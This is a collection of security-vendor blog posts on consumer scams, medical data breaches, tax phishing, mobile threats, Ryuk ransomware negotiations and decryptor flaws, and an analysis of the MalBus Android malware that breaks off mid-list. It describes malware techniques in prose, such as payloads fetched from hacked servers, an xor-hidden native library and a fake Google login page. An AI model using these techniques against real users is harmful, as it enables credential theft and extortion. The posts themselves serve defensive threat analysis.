  • Beware of online ticket scams. Scammers will be looking to steal payment information from fans in search of last-minute tickets to the games. To avoid this, it’s best to buy directly from the venue whenever possible. If you decide to purchase from a reseller, make sure to do your research and only buy from trusted vendors.
  • Use comprehensive security software. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links, and will warn you in the event that you do accidentally click on something malicious. It will provide visual warnings if you’re about to go to a suspicious site.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post How Online Scams Drive College Basketball Fans Mad appeared first on McAfee Blogs.

How to Safeguard Your Family Against A Medical Data Breach

Medical Data BreachThe risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

Breaches on the Rise

Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records being breached by a hacking or IT incident at a cost close to consumers at nearly $6 billion.

The IoT Factor

Medical Data Breach

Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, heart and blood pressure monitors.

To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

The Dark Web

The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

Some of the most valuable data to criminals are children’s health information (stolen from pediatrician offices) since a child’s credit records are clean and more useful tools in credit card fraud.

According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

“The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.

Medical Data Breach

Healthcare professionals, hospitals, and health insurance companies, while giving criminals an entry point, though responsible, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

Ways to Safeguard Medical Data

Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

How to Protect IoT Devices

Medical Data Breach

According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

  • Change default usernames and passwords
  • Isolate IoT devices on their protected networks
  • Configure network firewalls to inhibit traffic from unauthorized IP addresses
  • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
  • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
  • Ensure devices and their associated security patches are up-to-date
  • Apply cybersecurity best practices when connecting devices to a wireless network
  • Invest in a secure router with appropriate security and authentication practices

The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

How to Steer Clear of Tax Season Scams

*This blog contains research discovered by Elizabeth Farrell

It’s that time of year again – tax season! Whether you’ve already filed in the hopes of an early refund or have yet to start the process, one thing is for sure: cybercriminals will certainly use tax season as a means to get victims to give up their personal and financial information. This time of year is advantageous for malicious actors since the IRS and tax preparers are some of the few people who actually need your personal data. As a result, consumers are targeted with various scams impersonating trusted sources like the IRS or DIY tax software companies. Fortunately, every year the IRS outlines the most prevalent tax scams, such as voice phishing, email phishing, and fake tax software scams. Let’s explore the details of these threats.

So, how do cybercriminals use voice phishing to impersonate the IRS? Voice phishing, a form of criminal phone fraud, uses social engineering tactics to gain access to victims’ personal and financial information. For tax scams, criminals will make unsolicited calls posing as the IRS and leave voicemails requesting an immediate callback. The crooks will then demand that the victim pay a phony tax bill in the form of a wire transfer, prepaid debit card or gift card. In one case outlined by Forbes, victims received emails in their inbox that allegedly contained voicemails from the IRS. The emails didn’t actually contain any voicemails but instead directed victims to a suspicious SharePoint URL. Last year, a number of SharePoint phishing scams occurred as an attempt to steal Office 365 credentials, so it’s not surprising that cybercriminals are using this technique to access taxpayers’ personal data now as well.

In addition to voice phishing schemes, malicious actors are also using email to try and get consumers to give up their personal and financial information. This year alone, almost 400 IRS phishing URLs have been reported. Even back in December, we saw a surge of new email phishing scams trying to fool consumers into thinking the message was coming from the IRS or other members of the tax community. In a typical email phishing scheme, scammers try to obtain personal tax information like usernames and passwords by using spoofed email addresses and stolen logos. In many cases, the emails contain suspicious hyperlinks that redirect users to a fake site or PDF attachments that may download malware or viruses. If a victim clicks on these malicious links or attachments, they can seriously endanger their tax data by giving identity thieves the opportunity to steal their refund. What’s more, cybercriminals are also using subject lines like “IRS Important Notice” and “IRS Taxpayer Notice” and demanding payment or threatening to seize the victim’s tax refund.

Cybercriminals are even going so far as to impersonate trusted brands like TurboTax for their scams. In this case, DIY tax preparers who search for TurboTax software on Google are shown ads for pirated versions of TurboTax. The victims will pay a fee for the software via PayPal, only to have their computer infected with malware after downloading the software. You may be wondering, how do victims happen upon this malicious software through a simple Google search? Unfortunately, scammers have been paying to have their spoofed sites show up in search results, increasing the chances that an innocent taxpayer will fall victim to their scheme.

Money is a prime motivator for many consumers, and malicious actors are fully prepared to exploit this. Many people are concerned about how much they might owe or are predicting how much they’ll get back on their tax refund, and scammers play to both of these emotions. So, as hundreds of taxpayers are waiting for a potential tax return, it’s important that they navigate tax season wisely. Check out the following tips to avoid being spoofed by cybercriminals and identity thieves:

  • File before cybercriminals do it for you. The easiest defense you can take against tax seasons schemes is to get your hands on your W-2 and file as soon as possible. The more prompt you are to file, the less likely your data will be raked in by a cybercriminal.
  • Obtain a copy of your credit report. FYI – you’re entitled to a free copy of your credit report from each of the major bureaus once a year. So, make it a habit to request a copy of your file every three to four months, each time from a different credit bureau. That way, you can keep better track of and monitor any suspicious activity and act early if something appears fishy.
  • Beware of phishing attempts. It’s clear that phishing is the primary tactic crooks are leveraging this tax season, so it’s crucial you stay vigilant around your inbox. This means if any unfamiliar or remotely suspicious emails come through requesting tax data, double check their legitimacy with a manager or the security department before you respond. Be wary of strange file attachment names such as “virus-for-you.doc.” Remember: the IRS only contacts people by snail mail, so if you get an email from someone claiming to be from the IRS, stay away.
  • Watch out for spoofed websites. Scammers have extremely sophisticated tools that help disguise phony web addresses for DIY tax software, such as stolen company logos and site designs. To avoid falling for this, go directly to the source. Type the address of a website directly into the address bar of your browser instead of following a link from an email or internet search. If you receive any suspicious links in your email, investigating the domain is usually a good way to tell if the source is legitimate or not.
  • Consider an identity theft protection solution. If for some reason your personal data does become compromised, be sure to use an identity theft solution such as McAfee Identity Theft Protection, which allows users to take a proactive approach to protect their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Steer Clear of Tax Season Scams appeared first on McAfee Blogs.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down.  This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through apps stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

Quick Heal Threat Report – Cryptojacking rising but Ransomware still #1 threat for consumers

In wake of the growing incidences of targeted cyber-attacks on enterprises using Cryptojacking, due to its ease of deployment and instant return on investments; it rather comes as a surprise that malware authors are still counting on Ransomware for targeting consumers and home users. Yes, you heard it right! According…

Ryuk, Exploring the Human Connection

In collaboration with Bill Siegel and Alex Holdtman from Coveware.


At the beginning of 2019, McAfee ATR published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, collective industry peers discovered additional technical details on Ryuk’s inner workings, the overlap between Ryuk and Hermes2.1, and a detailed description of how the ransomware is piggybacking the infamous and ever evolving Trickbot as a primary attack vector. In this blog post we have teamed up with Coveware to take a closer look at the adversary and victim dynamics of Ryuk Ransomware. We structured our research using the Diamond threat model and challenged our existing hypotheses with fresh insights.

Introduction to The Diamond Model

Within Cyber Threat intelligence research, a popular approach is to model the characteristics of an attack using The Diamond Model of Intrusion Analysis. This model relates four basic elements of an intrusion: adversary, capabilities, infrastructure and victim.

For the Ryuk case described above the model can be applied as follows: “An Adversary, cyber-criminal(s), have a capability (Ryuk Ransomware) that is being spread via a TrickBot infection Infrastructure targeting specific victims.

Diamond model of Intrusion Analysis

The Diamond Model offers a holistic view of an intrusion that is a helpful guideline to shape the direction of intelligence research. By searching for relationships between two elements one can gather new evidence. For instance, by analyzing and reverse engineering a piece of malware one might uncover that a certain server is being used for command and control infrastructure, thus linking capability with infrastructure (as shown below).

Linking Infrastructure and Capability

Alternatively, one might search underground forums to find information on adversaries who sell certain pieces of malware, thus linking an adversary with a capability. For instance, finding the underground forum advertisement of Hermes2.1.

Linking Adversary and Capability

Analysis of Competing Hypotheses

In our earlier publication we explained The Analysis of Competing Hypotheses (ACH), the process of challenging formed hypotheses with research findings.
By following this method, we concluded that the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

In order to construct a hypothesis with the least falsifying evidence we welcome research published by our industry peers to dissimilate insights that challenge our hypotheses. When we combined all the evidence with links on the diamond model, we discovered that one essential link wasn’t made, the link between adversary and victim.

Seeking New Insights Between Adversary and Victim

Despite published research, the direct link between adversary and victim remained relatively unexplored. Unlike most cybercrime, ransomware and digital extortion frequently creates a strong social connection between adversary and victim. The adversary has certain needs and views the victim as the means to fulfill those needs. The connection between an adversary and victim often generates valuable insights, especially in cases where (extensive) negotiation take place.

Luckily, one of our NoMoreRansom partners, Coveware, is specialized in ransomware negotiations and has gained valuable insights help us link adversary and victim.

The social connection between Adversary and Victim

Ransom Amounts and Negotiations

By aggregating ransomware negotiation and payment data, Coveware is able to identify strain-specific ransomware trends. With regards to Ryuk, it should be noted that ransom amounts average more than 10x the average, making it the costliest type of ransomware. Coveware also observed that some Ryuk ransoms were highly negotiable, while others were not. The bar-belled negotiation results generated an average ransom payment of $71k, a 60% discount from an average opening ask of $145k.

The bar-belled negotiation outcomes meant that some victims were stonewalled. These victims either lost their data or took on staggering financial risk to pay the ransom. The outcomes also imply that in certain cases the adversary would rather receive infrequent large windfalls (often in excess of 100BTC), while in other cases the adversary was keen to monetize every attack and accept lower amounts to ensure payment. This difference in modus operandi suggests that more than one cyber-criminal group is operating Ryuk ransomware.

Ransom Note and Negotiation Similarities and Differences

Similarities between Bitpaymer and Ryuk ransom notes have been observed before. While it is not uncommon for ransom notes to share similar language, sequences of phrases tend to remain within the same ransomware family. Slight copy+paste modifications are made to the ransom text as a variant is passed along to different groups, but large alterations are rarely made. Below is a comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right).

A comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right)

The shared language implies that text once unique to a Bitpaymer campaign was borrowed for a Ryuk campaign, possibly by an operator running simultaneous ransom campaigns of both Bitpaymer and Ryuk or the imitation can be considered as the sincerest form of flattery.

Different Initial Email Response May Be Different Adversaries?

A more dramatic scripted communication difference has been observed in the initial email response from Ryuk adversaries. The initial email response is typically identical within ransomware families belonging to the same campaign. When significant differences in length, language, and initial ransom amount appear in the initial email response we are comfortable assuming they belong to unique groups with unique modus operandi. This would mean that Ryuk in being spread by more than one actor group.

Below are two such Ryuk examples:


Post Payment Bitcoin Activity

A final indicator that multiple groups are running simultaneous Ryuk campaigns can be observed in the activity of bitcoin after it hits a ransom address. Surprisingly, despite the differences between negotiation outcome and initial communications, Coveware observed little difference between the BTC wallets (blacked out to protect victims) associated with the above cases. Initial comparison showed no meaningful discrepancy in difference between the time of a ransom payment and the time of a corresponding withdraw. Additionally, the distribution of funds upon withdrawal was consistently split between two addresses. Coveware will continue to monitor the funds associated with campaigns for meaningful indicators.

Ryuk Negotiating Profiles

With few exceptions, the rest of the email replies during a Ryuk extortion negotiation are extremely short and blunt. Typical replies and retorts are generally less than 10 written words and often just a single number if the ransom amount is the point of discussion. This correspondence is unique to Ryuk.

One reply did contain quite a remarkable expression; “à la guerre comme à la guerre,” to contextualize the methods and reasons for the cyber criminals’ attacks on western companies. The French expression originates from the seventeenth century and literally translates to “in war as in war” and loosely translates to: “In Harsh times one has to do with what’s available”. The striking thing about this expression is that is prominently featured in volume 30 of the collected works of the Soviet Revolutionary leader Vladimir Lenin. Lenin uses the expression to describe the struggle of his people during the war against western capitalism.

This concept of “The capitalistic West versus the Poor east” is actually something McAfee ATR sees quite often expressed by cyber criminals from some of the Post-Soviet republics. This expression may be a clear indicator of the origin and cultural view of the criminals behind Ryuk.

Ryuk poses existential risk to certain industries

Even though the average ransom discounts of Ryuk are large (~60%), the absolute level of the ransom is extreme. Accordingly, we have seen evidence that links ransom demands to the size of the network footprint of the victim company. However, this doesn’t mean that the ransom demand correlates to the victims actual operational and financial size.

Companies in the IT Hosting and the Freight and Logistics industries have been particularly susceptible to this discrepancy. Coveware has assisted at least 3 companies that have had to unwind their business when an affordable ransom amount, could not be reached. Typically, downtime costs are 10x the ransom amount, but in these industries downtime costs can be particularly extreme.

IT Hosting companies are of note as the size and number of their servers can make them appear like a large organization. Unfortunately, the business of hosting involves high fixed costs, low operating margins, and zero tolerance of downtime by end clients.  Hosting companies that get attacked typically have a few hours to restore service before their clients drop them for alternatives. Moreover, these companies suffer irreparable harm to their reputations, and may trigger SLA breaches that leave them exposed to liability.  The inability to pay a six-figure ransom has caused multiple hosting companies to shut down.

Freight and Logistics firms are also acutely exposed. These firms also present like larger firms given the volume of data they move and their network footprint. Additionally, attacks against Freight and Logistics firms can cause immediate supply chain issues for the victims’ end clients, who are subsequently forced to route through other service providers. Similar to IT Hosting, Freight and Logistics firms have low operating margins and end clients with little tolerance for service interruptions. The inability to pay or negotiate a large ransom has materially impacted several firms in this industry.

Ryuk Decryptor findings and issues

When victims do pay the exorbitant ransom amount, the criminals will provide a decryptor to unlock a their files. This decryptor is actually framework that needs to be loaded with a victim’s private RSA key, provided by the criminals, in order to decrypt. Ensuring that the provided decryptor will only work for this specific victim. This setup allows the criminals to quickly load a victim’s key in the framework and offer a custom decryptor with minimal code change while the underlaying framework remains the same.

From Coveware’s experience we have learned that the decryption process is quite cumbersome and full of possible fatal errors. Luckily Coveware was able to share the Ryuk decryptor with McAfee ATR in order to take a closer look at the issues and level of sophistication of the decryptor.

Once launched the first thing the decryptor does is to search the HKEY_CURRENT_USER Hive for a value pair named “svchos” in the path “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” and delete the specific entry. This removes the persistence of the malware. Afterwards it will reboot the system and remove any remaining Ryuk malware still receding on the system.

Deleting the “svchos” value from the registry.

Once rebooted the user needs to run the tool again and the decryptor will provide two options to decrypt.

  • Decryption per file
  • Automatic decryption

The main interface of the Ryuk decryptor with the different menu options.

HERMES File Marker

During the decryption process we have found that the decryptor searches for the known file marker string HERMES which is located in the encrypted file.

The HERMES marker clearly visible within the file

The fact that Ryuk ransomware adds HERMES filemarker string was already known, but discovering this specific check routine in the decryptor strengthens the hypotheses that Ryuk is a slightly modified version of Hermes2.1 ransomware kit that is sold online even more.

Decryptor Issues

While examining the decryptor we were astonished by the lack of sophistication and the amount of errors that resided within the code. Some of the most prominent issues were:

  • If there is a space in the Windows file path the decryptor will fail the decryption process.
  • If there is a quotation mark (“) in the file path the decryptor will report an error that it cannot find the specific file.
  • The decryptor uses the “GetVersionExW” function to determine the windows version, from Windows 8.1. the value returned by this API has changed and the decryptor isn’t designed to handle this value.
  • The decryptor doesn’t remove the .RYUK extension and replace it with the original extension. So, there is no way the name of the file can give an indication towards the type of the file, something that can be extremely labor intensive for enterprise victims.
  • When choosing the manual option in the decryptor, the user has to supply a path of the specific file or choose “0” to finish. However, choosing a “0” will put the decryptor into an infinite loop.

Looking at the decryptor, it is very worrisome to see that the criminals behind Ryuk can get away with such bad programming. It shows a clear lack of empathy towards their victims and the absence of solid coding skills. Victims who do pay the exorbitant ransom demand are far from in the clear. The decryptor offered by the criminals has a very high risk of malfunctioning, resulting in permanent damage to their precious files. Victims should always make an exact copy of the encrypted hard disk before trying to use the decryptor.

Call to action in piecing the different parts together

By combining all the fresh insights with the information that was already discovered by ourselves and industry peers we can start defining our leading hypotheses around Ryuk. Based on this hypothesis, we will actively look for falsifying evidence. We encourage the security community to participate in this process. We realize that only by collaboration can we piece the different parts of the Ryuk puzzle together.

By now it should be without question that involvement of the DPRK is the least likely hypothesis. Our leading Hypothesis on Ryuk until proven otherwise is;

Ryuk is a direct descendant from Hermes2.1 with slight modifications, based on the code overlap in the ransomware as well as the decryptor. Ryuk is not designed to be used in a largescale corporate environment, based on all the scalability issues in the decryptor. At this moment there are several actors or actor-groups spreading Ryuk, based on the extortion modus operandi and different communications with the victims. The actors or actor-groups behind Ryuk have a relationship with one of the Post-Soviet republics, based on the Russian found in one of the encrypted files and the cultural references observed in the negotiations. The actors behind Ryuk most likely have an affiliation or relationship with the actors behind Trickbot and, based on their TTP, are better skilled at exploitation and lateral movement than pure Ransomware development.


In the last seven months Ryuk has proven to be a highly profitable form of ransomware, despite the poor programming behind it and its decryptor. The criminals have proven to be ruthless and several of their victims were forced to wind down their businesses after they were unable to afford the exorbitant ransom.

When a company does give in to the high demands it is extra painful to see a situation occur where they are permanently unable to recover their files due to the faulty decryptor.

A solid data loss prevention strategy still remains the best advice against all forms of ransomware, for general prevention advice please visit NoMoreRansom. Always seek professional assistance when you are faced with a targeted ransomware attack such as Ryuk.

The post Ryuk, Exploring the Human Connection appeared first on McAfee Blogs.

How To Sidestep Popular Social Scams

Each year, internet users lose billions of dollars to online scams, using clever ploys to trick us out of our information and money. By offering prizes, referencing current events, or just creating a sense of urgency, scammers know how to get us to click when we really shouldn’t. Check out these recent scams, so you know what to look out for.

Nosy Quizzes & Questionnaires

Quizzes circulating on Facebook, Twitter, and other social platforms may look like a fun way to win free stuff, but often they are phishing attacks in disguise. Many appear to be sponsored by big-name brands such as airlines and major retailers, offering free products or discount tickets if you just answer a few questions. The questions are designed to get you to reveal personal information that can be used to guess your passwords or security questions, such as your mother’s maiden name, or your hometown.

Creepy Crypto Scams 

While cryptocurrencies lost a lot of value over the last year, the same cannot be said for cryptocurrency scams. The majority of them center on distributing crypto mining malware, which allows hackers to access a person’s computer or device without their permission in order to mine for cryptocurrencies. In fact, these scams have been so prolific that at the end of 2018 McAfee reported that coin mining malware had grown more than 4000% in the previous year.

Many of these miners were distributed through phishing emails and websites, using “giveaway” scams on social media, or even via crypto mining chat groups on platforms such as Slack. Cybercrooks enter the chat rooms, pretending to be fellow miners, and encourage users to download malware disguised as “fixes” to crypto issues.

Romance & “Sextortion” Scams 

The meteoric rise of online dating has led to a similar increase in romance scams. These often involve bad actors preying on lonely people who are looking to connect. Scammers build up a sense of trust over online dating and social media platforms, before asking for money. They often claim the money is for an emergency, or a plane ticket to visit. This kind of manipulation works so well that the Better Business Bureau estimates that victims in the U.S. and Canada lost nearly $1 billion to romance scams between 2015 and 2018.

And while romance is one way to manipulate users, another driver is fear. This is certainly the case with the recent rise in so-called “sextortion” scams, which scare users into paying money to prevent incriminating pictures or videos of them from getting out. The bad guys claim that they obtained the embarrassing content by infecting the victim’s device with malware, and often send part of an old, leaked password as proof that they could have accessed their account.

Topical News Hooks

Whenever a major story sweeps the news, chances are the scammers are looking for ways to capitalize on it. This is exactly what happened during the recent U.S. government shutdown, which left 800,000 federal employees out of work for over a month. Since many of these workers were looking for extra income, job scams abounded. Some phony job ads asked workers to fill out detailed job application forms, in order to steal their Social Security numbers and other private information.

In another ruse, scammers sent out phony emails that appeared to be from the IRS, saying that the recipient could get a discount on their tax bills if they paid during the shutdown.

Tried-and-True Scams

Package Delivery— Phony package delivery emails usually spike around the holidays, but in the age of Amazon Prime delivery scams are circulating year-round. Be on the lookout for more recent Amazon scams that come in the form of a phishing email, asking you to review a product to get rewards. If you click on the link it could deliver malware, or even ransomware.

Tech Support— This is one of the oldest, but most persistent scams to date. Phishing websites and phony pop-up warnings that a computer or device is infected have led thousands of people to hand over personal and financial information to fix a problem they don’t really have.

Even though consumers have become savvier about these scams, a recent Microsoft survey found that 3 out of 5 people have been exposed to tech support scams over the last year.

So, now that you know what to look out for, here are our top tips for sidestepping the scammers:

  • Be careful where you click—Don’t open suspicious links and attachments, and never click on pop-up messages from an unknown source. If you get a suspicious login or payment request, go directly to the provider’s official website to see if the request is legitimate.
  • Know how to spot the fake—Phony messages or documents will often look like a simplified version of the real thing, with poor quality graphics, incorrect grammar and spelling, and a generic personal greeting.
  • Keep your personal information private—Avoid online quizzes, and never share personal or financial details with someone you don’t know in real life. Review your privacy and security settings on social sites to make sure that you aren’t leaking information.
  • Be a smart online shopper—Only buy from reputable websites, and steer away from deals that seem too good to be true. Be suspicious of unusual payment requests, such as buying gift cards or using virtual currency.
  • Become a password pro—Choose complex and unique passwords for all of your accounts. Consider using a password manager to help you create and store complicated passwords securely.
  • Protect your computers and devices—Use comprehensive security software that can safeguard you from the latest threats.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Sidestep Popular Social Scams appeared first on McAfee Blogs.

MalBus: Popular South Korean Bus App Series in Google Play Found Dropping Malware After 5 Years of Development

McAfee’s Mobile Research team recently learned of a new malicious Android application masquerading as a plugin for a transportation application series developed by a South Korean developer. The series provides a range of information for each region of South Korea, such as bus stop locations, bus arrival times and so on. There are a total of four apps in the series, with three of them available from Google Play since 2013 and the other from around 2017. Currently, all four apps have been removed from Google Play while the fake plugin itself was never uploaded to the store. While analyzing the fake plugin, we were looking for initial downloaders and additional payloads – we discovered one specific version of each app in the series (uploaded at the same date) which was dropping malware onto the devices on which they were installed, explaining their removal from Google Play after 5 years of development.

Figure 1. Cached Google Play page of Daegu Bus application, one of the apps in series

When the malicious transportation app is installed, it downloads an additional payload from hacked web servers which includes the fake plugin we originally acquired. After the fake plugin is downloaded and installed, it does something completely different – it acts as a plugin of the transportation application and installs a trojan on the device, trying to phish users to input their Google account password and completely take control of the device. What is interesting is that the malware uses the native library to take over the device and also deletes the library to hide from detection. It uses names of popular South Korean services like Naver, KakaoTalk, Daum and SKT. According to our telemetry data, the number of infected devices was quite low, suggesting that the final payload was installed to only a small group of targets.

The Campaign

The following diagram explains the overall flow from malware distribution to device infection.

Figure 2. Device infection process

When the malicious version of the transportation app is installed, it checks whether the fake plugin is already installed and, if not, downloads from the server and installs it. After that, it downloads and executes an additional native trojan binary which is similar to the trojan which is dropped by the fake plugin. After everything is done, it connects with the C2 servers and handles received commands.

Initial Downloader

The following table shows information about the malicious version of each transportation app in the series. As the Google Play number of install stats shows, these apps have been downloaded on many devices.

Unlike the clean version of the app, the malicious version contains a native library named “”.

Figure 3. Transportation app version with malicious native library embedded

In the BaseMainActivity class of the app, it loads the malicious library and calls startUpdate() and updateApplication().

Figure 4. Malicious library being loaded and executed in the app

startUpdate() checks whether the app is correctly installed by checking for the existence of a specific flag file named “background.png” and whether the fake plugin is installed already. If the device is not already infected, the fake plugin is downloaded from a hacked web server and installed after displaying a toast message to the victim. updateApplication() downloads a native binary from the same hacked server and dynamically loads it. The downloaded file (saved as is then deleted after being loaded into memory and, finally, it executes an exported function which acts as a trojan. As previously explained, this file is similar to the file dropped by the fake plugin which is discussed later in this post.

Figure 5 Additional payload download servers

Fake Plugin

The fake plugin is downloaded from a hacked web server with file extension “.mov” to look like a media file. When it is installed and executed, it displays a toast message saying the plugin was successfully installed (in Korean) and calls a native function named playMovie(). The icon for the fake plugin soon disappears from the screen. The native function implemented in, which is stored inside the asset folder, drops a malicious trojan to the current running app’s directory masquerading as file. The dropped trojan is originally embedded in the xor’ed, which is decoded at runtime. After giving permissions, the address of the exported function “Libfunc” in the dropped trojan is dynamically retrieved using dlsym(). The dropped binary in the filesystem is deleted to avoid detection and finally Libfunc is executed.

Figure 6 Toast message when malware is installed

In the other forked process, it tries to access the “” file on an installed SD Card, if there is one, and if it succeeds, it tries starting “.KaKaoTalk” activity which displays a Google phishing page (more on that in the next section) . The overall flow of the dropper is explained in the following diagram:

Figure 7. Execution flow of the dropper

Following is a snippet of a manifest file showing that “.KaKaoTalk” activity is exported.

Figure 8. Android Manifest defining “.KaKaoTalk” activity as exported

Phishing in JavaScript

KakaoTalk class opens a local HTML file, javapage.html, with the user’s email address registered on the infected device automatically set to log into their account.

Figure 9. KakaoTalk class loads malicious local html file

The victim’s email address is set to the local page through a JavaScript function setEmailAddress after the page is finished loading. A fake Korean Google login website is displayed:

Figure 10. The malicious JavaScript shows crafted Google login page with user account

We found the following attempts of exploitation of Google legitimate services by the malware author:

  • Steal victim’s Google account and password
  • Request password recovery for a specific account
  • Set recovery email address when creating new Google account

